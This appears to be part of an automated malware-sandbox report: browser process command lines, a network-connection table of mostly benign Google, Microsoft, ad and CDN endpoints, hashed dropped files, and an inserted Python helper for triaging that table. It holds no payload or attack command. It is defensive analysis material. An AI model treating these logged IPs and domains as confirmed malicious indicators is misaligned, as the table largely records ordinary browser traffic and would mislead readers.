"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4128 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.msn.com | udp |
| US | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.173:443 | accounts.google.com | udp |
| NL | 142.250.179.174:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | edgedl.me.gvt1.com | udp |
| US | 34.104.35.123:80 | edgedl.me.gvt1.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| NL | 216.58.208.97:443 | clients2.googleusercontent.com | udp |
| NL | 216.58.208.97:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 142.250.179.142:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| NL | 172.217.168.206:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 172.217.168.206:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 172.217.168.206:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 172.217.168.206:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 172.217.168.206:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | lh5.googleusercontent.com | udp |
| NL | 216.58.208.97:443 | lh5.googleusercontent.com | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| NL | 185.88.181.7:80 | xvideos.com | tcp |
| NL | 185.88.181.7:80 | N/A | tcp |
| NL | 185.88.181.8:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| NL | 185.88.180.106:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| NL | 185.76.10.11:443 | cdn77-pic.xvideos-cdn.com | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| NL | 142.250.179.138:443 | content-autofill.googleapis.com | tcp |
| NL | 185.76.10.12:443 | N/A | tcp |
| NL | 185.76.10.12:443 | N/A | tcp |
| NL | 185.88.181.8:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| NL | 142.250.179.138:443 | N/A | udp |
| NL | 94.46.155.35:443 | N/A | tcp |
| NL | 185.88.181.8:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| NL | 185.88.181.8:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| NL | 185.88.180.106:443 | N/A | tcp |
| NL | 185.88.180.106:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 209.197.3.84:443 | N/A | tcp |
| US | 205.185.216.42:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| NL | 185.76.10.11:443 | cdn77-pic.xvideos-cdn.com | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 205.185.216.42:443 | N/A | tcp |
| NL | 87.248.202.99:443 | s3t3d2y7.ackcdn.net | tcp |
| NL | 185.76.10.12:443 | banners-cdn77.trafficfactory.biz | tcp |
| NL | 95.211.229.245:443 | syndication.realsrv.com | tcp |
| NL | 185.88.180.106:443 | N/A | tcp |
| NL | 95.211.229.245:443 | syndication.realsrv.com | tcp |
| LU | 93.93.51.223:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| NL | 94.46.155.35:443 | N/A | tcp |
| LU | 93.93.51.191:443 | N/A | tcp |
| LU | 93.93.51.201:443 | pt-static1.jsmsat.com | tcp |
| LU | 93.93.51.201:443 | pt-static5.jsmsat.com | tcp |
| LU | 93.93.51.201:443 | N/A | tcp |
| LU | 93.93.51.201:443 | pt-static4.jsmsat.com | tcp |
| LU | 93.93.51.201:443 | pt-static3.jsmsat.com | tcp |
| NL | 95.211.229.245:443 | syndication.realsrv.com | tcp |
| LU | 93.93.51.190:443 | galleryn0.awemdia.com | tcp |
| LU | 93.93.51.225:443 | N/A | tcp |
| NL | 185.88.180.106:443 | N/A | tcp |
| NL | 185.88.181.8:443 | N/A | tcp |
| US | 209.197.3.84:443 | N/A | tcp |
| US | 209.197.3.84:443 | N/A | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| NL | 185.76.10.11:443 | cdn77-pic.xvideos-cdn.com | tcp |
| NL | 185.88.180.106:443 | N/A | tcp |
| NL | 185.88.181.8:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| NL | 185.76.10.11:443 | N/A | tcp |
| NL | 185.76.10.11:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 8.252.22.115:443 | N/A | tcp |
| US | 205.185.216.42:443 | N/A | tcp |
| US | 209.197.3.84:443 | N/A | tcp |
| US | 209.197.3.84:443 | N/A | tcp |
| NL | 172.217.168.206:443 | encrypted-tbn0.gstatic.com | udp |
| US | 3.234.104.255:443 | www.iplocation.net | tcp |
| NL | 142.250.179.142:443 | apis.google.com | udp |
| NL | 142.251.39.110:443 | play.google.com | tcp |
| NL | 142.251.39.110:443 | N/A | udp |
| NL | 216.58.208.98:443 | N/A | tcp |
| US | 172.67.161.209:443 | go.ezodn.com | tcp |
| NL | 52.222.142.111:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| NL | 54.192.86.77:443 | go.ezoic.net | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| NL | 216.58.208.98:443 | N/A | udp |
| NL | 216.58.208.98:443 | N/A | udp |
| NL | 52.222.142.111:443 | c.amazon-adsystem.com | tcp |
| FR | 46.105.202.126:443 | cdn.id5-sync.com | tcp |
| US | 192.184.69.141:443 | N/A | tcp |
| NL | 142.250.179.138:443 | N/A | udp |
| GB | 94.31.29.32:443 | N/A | tcp |
| US | 104.18.29.173:443 | cdn.adpushup.com | tcp |
| NL | 142.250.179.193:443 | d6f7e824a13e4157b97c3d2aba3ccb11.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| NL | 142.250.179.195:443 | update.googleapis.com | tcp |
| IE | 52.95.119.178:443 | N/A | tcp |
| US | 69.16.175.42:443 | code.jquery.com | tcp |
| DE | 141.95.3.10:443 | N/A | tcp |
| NL | 54.192.86.105:443 | rules.quantcount.com | tcp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | tcp |
| US | 104.21.73.110:443 | basher.ezodn.com | tcp |
| NL | 142.251.36.34:443 | www.googletagservices.com | tcp |
| US | 75.101.253.183:443 | N/A | tcp |
| FR | 2.18.99.184:443 | N/A | tcp |
| US | 35.169.48.117:443 | N/A | tcp |
| US | 52.21.42.235:443 | N/A | tcp |
| NL | 89.207.16.201:443 | N/A | tcp |
| NL | 104.126.125.209:443 | N/A | tcp |
| NL | 185.33.220.100:443 | N/A | tcp |
| NL | 185.33.220.100:443 | N/A | tcp |
| NL | 216.52.2.30:443 | N/A | tcp |
| US | 13.248.245.213:443 | N/A | tcp |
| NL | 185.29.134.244:443 | N/A | tcp |
| US | 137.116.89.182:443 | N/A | tcp |
| US | 137.116.89.182:443 | N/A | tcp |
| US | 52.223.40.198:443 | N/A | tcp |
| US | 35.241.15.198:443 | N/A | tcp |
| FR | 54.37.103.83:443 | N/A | tcp |
| IE | 52.31.82.104:443 | N/A | tcp |
| DE | 141.95.3.10:443 | N/A | tcp |
| US | 54.166.81.178:443 | N/A | tcp |
| US | 3.234.104.255:443 | N/A | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.222:443 | fp.msedge.net | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| DE | 37.252.172.38:443 | N/A | tcp |
| DE | 18.197.84.79:443 | N/A | tcp |
| US | 64.74.236.223:443 | N/A | tcp |
| US | 52.200.181.105:443 | N/A | tcp |
| US | 35.244.159.8:443 | N/A | tcp |
| IE | 34.241.81.232:443 | N/A | tcp |
| US | 52.21.104.248:443 | N/A | tcp |
| US | 132.226.41.106:443 | N/A | tcp |
| US | 169.197.150.7:443 | N/A | tcp |
| US | 64.74.236.159:443 | N/A | tcp |
| US | 34.238.202.227:443 | N/A | tcp |
| IE | 52.95.119.178:443 | N/A | tcp |
| US | 35.169.48.117:443 | N/A | tcp |
| US | 199.127.204.147:443 | N/A | tcp |
| US | 198.148.27.140:443 | N/A | tcp |
| NL | 142.251.39.97:443 | N/A | tcp |
| NL | 142.251.39.97:443 | N/A | tcp |
| NL | 142.251.39.97:443 | N/A | tcp |
| NL | 142.251.36.34:443 | N/A | udp |
| NL | 142.251.39.97:443 | N/A | tcp |
| NL | 142.251.39.97:443 | N/A | udp |
| NL | 142.250.179.194:443 | N/A | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| SE | 51.12.0.5:443 | mma01prdapp04-canary-opaph.netmon.azure.com | tcp |
| US | 172.66.42.247:443 | N/A | tcp |
| US | 172.67.161.209:443 | N/A | tcp |
| NL | 185.29.134.244:443 | N/A | tcp |
| US | 35.186.193.173:443 | N/A | tcp |
| US | 192.184.69.143:443 | N/A | tcp |
| DE | 85.114.159.93:443 | N/A | tcp |
| US | 3.213.20.229:443 | N/A | tcp |
| NL | 31.220.27.134:443 | N/A | tcp |
| NL | 185.33.220.100:443 | N/A | tcp |
| FR | 2.18.99.184:443 | N/A | tcp |
| FR | 2.18.99.184:443 | N/A | tcp |
| NL | 142.250.179.194:443 | N/A | tcp |
| NL | 142.250.179.198:443 | N/A | tcp |
| US | 34.232.114.255:443 | N/A | tcp |
| US | 44.197.25.138:443 | N/A | tcp |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| FR | 52.136.136.11:443 | 971587eccfa237514b4e45e6cc933774.clo.footprintdns.com | tcp |
| NL | 169.50.137.182:443 | N/A | tcp |
| US | 174.137.133.49:443 | N/A | tcp |
| DE | 51.89.9.251:443 | N/A | tcp |
| US | 172.66.41.9:443 | N/A | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 13.107.136.254:443 | spo-ring.msedge.net | tcp |
| NL | 104.109.249.82:443 | N/A | tcp |
| NL | 104.109.249.82:443 | N/A | tcp |
| NL | 142.250.179.198:443 | N/A | udp |
| NL | 142.250.179.193:443 | N/A | tcp |
| NL | 142.250.179.193:443 | N/A | tcp |
| NL | 142.250.179.193:443 | N/A | tcp |
| NL | 142.250.179.193:443 | N/A | tcp |
| NL | 142.250.179.193:443 | N/A | tcp |
| NL | 216.58.208.106:443 | N/A | tcp |
| NL | 13.227.219.28:443 | N/A | tcp |
| NL | 142.250.179.198:443 | N/A | udp |
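The table above mixes whatever the sample itself did with the traffic of the Chrome instance running in the sandbox (Google and Microsoft endpoints, ad and CDN networks, the sites the browser was opened on), and a large share of the rows carry no Domain value. The Python helper below is an added example, not part of this report or of the sandbox's own tooling. It parses rows in the report's pipe-delimited layout, tolerating rows where the Domain cell is absent and the protocol has slid into its place, fills a missing domain from any other row that reached the same IP on a non-DNS port, dedupes repeats, and buckets each unique destination as resolver traffic, browser/platform background noise, an external-IP lookup service (the behaviour behind the report's "Looks up external IP address via web service" signature, which www.iplocation.net above matches), an unresolved raw IP, or something to review by hand. The noise suffix list and the IP-lookup domain list are assumptions chosen for this example; the sample rows are a subset copied from the table above.

```python
"""Bucket the rows of a sandbox 'Network' table into resolver traffic, browser/platform
background noise, external-IP lookup services, unresolved IPs and manual-review items.
Added example; the suffix and lookup lists below are assumptions, not report data."""
import re
from collections import defaultdict

# Sample input: a subset of rows copied from the Network table above (constructed).
# Two layouts occur: a proper 4-cell row, and a row whose Domain cell is absent so
# the protocol sits in the third cell and the fourth cell is empty.
SAMPLE_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.msn.com | udp |
| US | 204.79.197.203:443 | api.msn.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| NL | 142.250.179.173:443 | accounts.google.com | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| NL | 185.88.181.7:80 | xvideos.com | tcp |
| NL | 185.88.181.7:80 | tcp | |
| US | 8.252.22.115:443 | tcp | |
| US | 8.252.22.115:443 | tcp | |
| US | 3.234.104.255:443 | www.iplocation.net | tcp |
| US | 3.234.104.255:443 | tcp | |
"""

PROTOS = {"tcp", "udp"}
ROW_RE = re.compile(r"^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|?\s*$")

# Assumed list: these suffixes are the sandbox's Chrome/Windows talking home.
NOISE_SUFFIXES = (".google.com", ".googleapis.com", ".gstatic.com", ".googleusercontent.com",
                  ".gvt1.com", ".msn.com", ".msedge.net", ".bing.com", ".footprintdns.com",
                  ".azure.com")
# Assumed list of public "what is my IP" services; www.iplocation.net is the one in the report.
IP_LOOKUP_DOMAINS = {"www.iplocation.net", "api.ipify.org", "ifconfig.me", "ip-api.com"}


def parse_row(line):
    """Return {'country','ip','port','domain','proto'} for a data row, else None."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    country, dest, c3, c4 = (c.strip() for c in m.groups())
    if ":" not in dest:                   # header row or not a connection row
        return None
    ip, _, port = dest.rpartition(":")
    if c3.lower() in PROTOS and not c4:   # Domain cell missing, protocol slid left
        domain, proto = "", c3.lower()
    else:
        domain, proto = c3, c4.lower()
    if domain.upper() == "N/A":
        domain = ""
    return {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto}


def classify(row):
    ip, port, domain = row["ip"], row["port"], row["domain"]
    if port in (53, 5353) or domain == "dns.google" or ip.startswith("224."):
        return "infra"        # DNS, DoH to dns.google, mDNS: plumbing, not a C2 lead
    if domain in IP_LOOKUP_DOMAINS:
        return "ip-lookup"    # 'Looks up external IP address via web service'
    if domain and any(domain == s.lstrip(".") or domain.endswith(s) for s in NOISE_SUFFIXES):
        return "noise"
    if not domain:
        return "unresolved"   # raw IP never seen with a name anywhere in the table
    return "review"


def triage(table_text):
    """Parse a pipe table, fill blank domains from same-IP rows, dedupe, and bucket."""
    rows = [r for r in map(parse_row, table_text.splitlines()) if r]
    # A port-53 row's Domain is the query name, not the resolver's name, so skip those
    # when learning which name a destination IP was reached under.
    ip_to_domain = {}
    for r in rows:
        if r["domain"] and r["port"] != 53:
            ip_to_domain.setdefault(r["ip"], r["domain"])
    buckets = defaultdict(set)
    for r in rows:
        domain = r["domain"] or ip_to_domain.get(r["ip"], "")
        key = (r["ip"], r["port"], domain, r["proto"])
        buckets[classify({**r, "domain": domain})].add(key)
    return {name: sorted(entries) for name, entries in buckets.items()}


if __name__ == "__main__":
    for name, entries in triage(SAMPLE_ROWS).items():
        print(f"{name}:")
        for ip, port, domain, proto in entries:
            print(f"  {ip}:{port}/{proto}  {domain or '-'}")
```

Feed it the whole table rather than the sample and the "review" and "unresolved" buckets are where the manual work starts; the "noise" bucket only says the suffix list matched, not that the traffic is safe, so widen or narrow that list to fit the sandbox image in use.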
Files
memory/3200-134-0x000002EE16BE0000-0x000002EE16BE2000-memory.dmp
memory/3200-135-0x000002EE2F3B0000-0x000002EE2F3D2000-memory.dmp
memory/3200-139-0x000002EE16BE6000-0x000002EE16BE8000-memory.dmp
memory/3200-138-0x000002EE16BE3000-0x000002EE16BE5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d34112a7b4df3c9e30ace966437c5e40 |
| SHA1 | ec07125ad2db8415cf2602d1a796dc3dfc8a54d6 |
| SHA256 | cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf |
| SHA512 | 49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053 |
memory/1812-143-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-144-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-145-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-146-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-147-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-185-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp
memory/1812-186-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp
memory/1812-216-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-217-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-218-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/1812-219-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 541c7ab7219c2c88cf5f709d110ef512 |
| SHA1 | 64f6fa1b8dd00f1b4388545cb24bd9979fb39de0 |
| SHA256 | 74943f411fa01eb794bf3a1ab47ee97c59c8178e7e63a7b1737ef4d2de26841e |
| SHA512 | 477daec82c8feace9e383b880ccccaa109e2b4e84bd14effb8e1f415b0f9555e74118ca237c537f331d70fd9821948078ae11d40c765ff509dde8a5256ade4e7 |
memory/2976-222-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-223-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-224-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-225-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-226-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-229-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp
memory/2976-230-0x00007FFCA3510000-0x00007FFCA3520000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177
| MD5 | b855da5683d0295842488908b9b1e5e4 |
| SHA1 | 42b374f7b495de7bcedbc06571bd0043ec37fc78 |
| SHA256 | 023eb30ed1a586cfe2d24d3457feb50396b52e4ccb633b2154cfee7ba83b67a2 |
| SHA512 | dd3ae15f022249d16d322c272c813fcca1366db3f34bd3a1d6c52ba546acccf8a4aeb5203d6c94f44ef492f0402422e3f8714ef3bb3daf3bbe6e4aa05e860dec |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177
| MD5 | f2d0bdefbd0fd1e6ca945e1f5bf2eec7 |
| SHA1 | 98b8621079438c64b7f9922c0169b3e2e4969221 |
| SHA256 | 1b717055ef2c4bb10845ec94320d0afd3054f69ab720fdcb950fc62e3de83804 |
| SHA512 | 189163aea0b4f0e0b2f23de0f12ab5aa22687274e7cbe9efe8720bda89f0e7ffaf4a0e7af4fa90cde178da2c6f2c09a9c83b1d1e0058eef4ef5f772c8e0bfc79 |
memory/2976-260-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-261-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-262-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
memory/2976-263-0x00007FFCA59F0000-0x00007FFCA5A00000-memory.dmp
\??\pipe\crashpad_892_BTWYUWTYXIHTKMQN
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 567cecc3df75dc852f6b57c031b91d1a |
| SHA1 | 4b94058a16b66ffda0a9bf0853ec6e0e6cd5a15f |
| SHA256 | f305b5052cb730e7265a52c2ad1b5f5cfe406e151bfa137753805fa752217a32 |
| SHA512 | 895dd6fe6862948e132d81ace0f96bc1e61285d5a532554b0987fdd31a32404e37b26bf3bb1d33070e8e35a0a2ce7116af26513c4291115dc3e189ca16431544 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |